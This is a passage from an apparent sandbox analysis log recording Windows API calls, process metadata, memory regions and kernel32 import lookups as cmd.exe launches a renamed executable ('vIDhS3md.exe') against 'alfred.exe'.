returned 18 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0212.046] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0212.046] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0212.046] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0212.046] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0212.046] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0212.046] SetErrorMode (uMode=0x0) returned 0x0 [0212.046] SetErrorMode (uMode=0x1) returned 0x0 [0212.046] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x93a078, lpFilePart=0x6bee44 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x6bee44*="Desktop") returned 0x1d [0212.046] SetErrorMode (uMode=0x0) returned 0x1 [0212.047] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0212.047] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.051] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.051] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.051] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0x6bebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6bebf0) returned 0x939450 [0212.051] FindClose (in: hFindFile=0x939450 | out: hFindFile=0x939450) returned 1 [0212.051] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0212.051] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0212.051] GetConsoleTitleW (in: lpConsoleTitle=0x6bf0c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.051] InitializeProcThreadAttributeList (in: lpAttributeList=0x6beff0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x6befd4 | out: lpAttributeList=0x6beff0, lpSize=0x6befd4) returned 1 [0212.051] UpdateProcThreadAttribute (in: lpAttributeList=0x6beff0, dwFlags=0x0, Attribute=0x60001, lpValue=0x6befdc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x6beff0, lpPreviousValue=0x0) returned 1 [0212.051] GetStartupInfoW (in: lpStartupInfo=0x6bf028 | out: lpStartupInfo=0x6bf028*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x38, hStdOutput=0xc0, hStdError=0x40)) [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"alf", _MaxCount=0x7) returned -3 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0212.052] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0212.052] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.053] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x6bef78*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x6befc4 | out: lpCommandLine="vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner", lpProcessInformation=0x6befc4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xe34, dwThreadId=0xe08)) returned 1 [0212.364] CloseHandle (hObject=0xa4) returned 1 [0212.364] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.365] GetEnvironmentStringsW () returned 0x938158* [0212.365] FreeEnvironmentStringsA (penv="=") returned 1 [0212.365] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0272.813] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x6bef5c | out: lpExitCode=0x6bef5c*=0x0) returned 1 [0272.813] CloseHandle (hObject=0xa8) returned 1 [0272.813] _vsnwprintf (in: _Buffer=0x6bf044, _BufferCount=0x13, _Format="%08X", _ArgList=0x6bef64 | out: _Buffer="00000000") returned 8 [0272.813] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0272.813] GetEnvironmentStringsW () returned 0x938158* [0272.813] FreeEnvironmentStringsA (penv="=") returned 1 [0272.813] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0272.813] GetEnvironmentStringsW () returned 0x938158* [0272.813] FreeEnvironmentStringsA (penv="=") returned 1 [0272.813] DeleteProcThreadAttributeList (in: lpAttributeList=0x6beff0 | out: lpAttributeList=0x6beff0) [0272.813] _get_osfhandle (_FileHandle=1) returned 0xc0 [0272.813] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0272.813] _get_osfhandle (_FileHandle=1) returned 0xc0 [0272.813] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0272.813] _get_osfhandle (_FileHandle=0) returned 0x38 [0272.813] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0272.961] SetConsoleInputExeNameW () returned 0x1 [0272.961] GetConsoleOutputCP () returned 0x1b5 [0273.139] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0273.139] SetThreadUILanguage (LangId=0x0) returned 0x409 [0273.421] exit (_Code=0) Thread: id = 140 os_tid = 0xe10 Process: id = "20" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x72764000" os_pid = "0xe34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0xe04" cmd_line = "vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1580 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1581 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1582 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1583 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1584 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1585 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1586 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1587 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1588 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 1589 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1590 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1591 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1592 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1593 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1594 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1595 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1596 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1597 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 1598 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1599 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1600 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1601 start_va = 0x5d0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1602 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1603 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1604 start_va = 0x250000 end_va = 0x30dfff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1605 start_va = 0x74990000 end_va = 0x74a20fff entry_point = 0x74990000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1606 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1607 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1608 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1694 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1695 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1696 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1697 start_va = 0x810000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 1698 start_va = 0x74380000 end_va = 0x74411fff entry_point = 0x74380000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 1699 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1700 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1701 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1702 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1703 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1704 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1705 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1706 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1707 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 1708 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1709 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1710 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1711 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1712 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1713 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1714 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1715 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1716 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1717 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1718 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1781 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1782 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1783 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1784 start_va = 0x820000 end_va = 0x9a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 1785 start_va = 0x9b0000 end_va = 0xb30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 1786 start_va = 0xb40000 end_va = 0x1f3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 1787 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1788 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1873 start_va = 0x7fe40000 end_va = 0x7feacfff entry_point = 0x7fe40000 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Thread: id = 141 os_tid = 0xe08 [0217.986] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0217.987] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0217.987] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0217.987] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0217.987] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0217.987] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0217.987] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0217.988] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0217.988] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0217.988] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0217.988] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0217.988] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0217.988] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0217.988] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0217.988] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0217.988] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0217.989] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0217.989] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0217.989] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0217.989] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0217.989] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0217.989] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0217.989] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0217.989] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0217.989] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0217.989] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0217.990] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0217.990] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0217.990] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0217.990] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0217.990] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0217.990] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0217.990] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0217.990] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0217.990] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0217.990] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0217.991] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0217.991] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0217.991] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0217.991] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0217.991] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0217.991] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0217.991] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0217.991] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0217.991] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0217.991] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0217.992] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0217.992] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0217.992] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0217.992] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0217.992] GetProcAddress (hModule=0x75130000, 